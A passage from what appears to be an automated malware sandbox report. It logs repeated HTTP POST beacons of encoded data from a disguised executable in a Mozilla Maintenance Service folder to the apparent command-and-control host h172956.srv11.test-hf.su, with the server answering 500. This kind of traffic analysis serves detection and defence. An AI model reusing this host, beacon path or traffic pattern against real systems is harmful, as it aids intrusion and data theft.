                                                                    Data Ascii: QZT^[]UT^WZQW^P[TWT^VYW_T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9B,2*'#'P!8>'+81 Q5#!#Y0$_&,Z89%Z"!Q*
                                                                    Mar 5, 2024 22:28:41.065325022 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    76192.168.2.54979891.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:41.394965887 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:41.603652000 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:41.603885889 CET2596OUTData Raw: 51 5d 51 59 5b 5c 55 55 5e 57 5a 51 57 5a 50 59 54 51 54 5f 56 5f 57 58 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q]QY[\UU^WZQWZPYTQT_V_WXT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:/*U33_35&/!$3&) U5,T"Y$4#X1"/%Z"!Q*%
                                                                    Mar 5, 2024 22:28:41.841346979 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    77192.168.2.54980091.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:42.238491058 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:42.445571899 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:42.445883036 CET1920OUTData Raw: 54 5e 54 5d 5b 5f 55 53 5e 57 5a 51 57 5e 50 58 54 50 54 5e 56 5f 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T^T][_US^WZQW^PXTPT^V_WTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9C.".U0#&&%"-?)$;<1P6?$U5#\'2Z>,%Z"!Q*
                                                                    Mar 5, 2024 22:28:42.694144011 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    78192.168.2.54980191.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:42.365664959 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:42.576636076 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:42.576853037 CET2596OUTData Raw: 54 5c 54 5b 5b 5d 55 54 5e 57 5a 51 57 5f 50 5d 54 50 54 5d 56 5c 57 5f 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T\T[[]UT^WZQW_P]TPT]V\W_T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9E,.0 !069/?-';?\1;5< "70'<&<Y,%Z"!Q*1
                                                                    Mar 5, 2024 22:28:42.813406944 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    79192.168.2.54980291.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:43.143866062 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:43.355164051 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:43.355372906 CET2596OUTData Raw: 51 5e 54 5f 5e 5d 50 51 5e 57 5a 51 57 58 50 53 54 50 54 5a 56 5a 57 5d 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q^T_^]PQ^WZQWXPSTPTZVZW]T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9;53%'%//$'9U56?#]'+\%/9%Z"!Q*-
                                                                    Mar 5, 2024 22:28:43.594196081 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    80192.168.2.54980391.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:43.924304008 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:44.134926081 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:44.135270119 CET2596OUTData Raw: 54 59 51 59 5e 5d 55 52 5e 57 5a 51 57 50 50 58 54 51 54 5d 56 54 57 59 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TYQY^]UR^WZQWPPXTQT]VTWYT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:;193&3558?X33%*$P#? P"<3$2Z:/%Z"!Q*
                                                                    Mar 5, 2024 22:28:44.376697063 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    81192.168.2.54980491.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:44.707488060 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:44.917486906 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:44.917890072 CET2596OUTData Raw: 51 5c 51 5a 5b 59 50 56 5e 57 5a 51 57 5e 50 5d 54 52 54 52 56 5d 57 58 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q\QZ[YPV^WZQW^P]TRTRV]WXT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9A/33-/!0Y%)?#,", '?2<,%Z"!Q*
                                                                    Mar 5, 2024 22:28:45.155961037 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    82192.168.2.54980591.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:45.494246960 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:45.705544949 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:45.705831051 CET2596OUTData Raw: 54 58 51 5a 5e 5a 50 50 5e 57 5a 51 57 5d 50 5f 54 52 54 5a 56 5d 57 5c 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TXQZ^ZPP^WZQW]P_TRTZV]W\T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:/2%%#$%&;<6_'/%9(6?'5($;]$<.Y/%Z"!Q*9
                                                                    Mar 5, 2024 22:28:45.945550919 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    83192.168.2.54980691.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:46.283693075 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:46.493628025 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:46.493868113 CET2596OUTData Raw: 51 59 54 50 5b 56 50 50 5e 57 5a 51 57 5d 50 58 54 52 54 5a 56 55 57 5d 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: QYTP[VPP^WZQW]PXTRTZVUW]T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9/!6S% &'P=-<*$8#\':?!P!,]3'2;9%Z"!Q*9
                                                                    Mar 5, 2024 22:28:46.730211973 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    84192.168.2.54980791.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:47.067908049 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:47.277792931 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:47.278280020 CET2596OUTData Raw: 54 5d 54 5b 5e 5a 50 53 5e 57 5a 51 57 5f 50 53 54 51 54 5b 56 5a 57 5e 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T]T[^ZPS^WZQW_PSTQT[VZW^T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9D.!9%0*'6*X8._$'Y1;6(P5$'+^2?!;9%Z"!Q*1
                                                                    Mar 5, 2024 22:28:47.515959024 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    85192.168.2.54980991.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:47.916030884 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:48.129215956 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:48.129556894 CET1920OUTData Raw: 51 5b 54 5c 5b 5f 55 5d 5e 57 5a 51 57 5f 50 5d 54 50 54 5e 56 5c 57 5e 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q[T\[_U]^WZQW_P]TPT^V\W^T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:.26S33_39,?"X0^#[1V#< U5'\0Y$,%;9%Z"!Q*1
                                                                    Mar 5, 2024 22:28:48.366027117 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    86192.168.2.54981091.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:48.034240007 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:48.244180918 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:48.244460106 CET2596OUTData Raw: 51 59 54 5c 5b 5d 55 57 5e 57 5a 51 57 5c 50 5f 54 54 54 59 56 5d 57 5f 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: QYT\[]UW^WZQW\P_TTTYV]W_T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9D/W1$2$6\8?$+;2)T#<"<?\$2-9%Z"!Q*=
                                                                    Mar 5, 2024 22:28:48.479636908 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    87192.168.2.54981191.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:48.815577030 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:49.027170897 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:49.027487993 CET2596OUTData Raw: 54 51 51 5d 5e 5b 55 53 5e 57 5a 51 57 5a 50 5c 54 54 54 52 56 5b 57 5e 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TQQ]^[US^WZQWZP\TTTRV[W^T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:;":V%0>356;$8+%:<T!?+"<0$$,$/!/%Z"!Q*%
                                                                    Mar 5, 2024 22:28:49.264858961 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    88192.168.2.54981291.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:49.803162098 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:50.013828039 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:50.014149904 CET2596OUTData Raw: 51 5a 54 5f 5b 5c 55 51 5e 57 5a 51 57 5d 50 58 54 55 54 5d 56 5a 57 5e 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
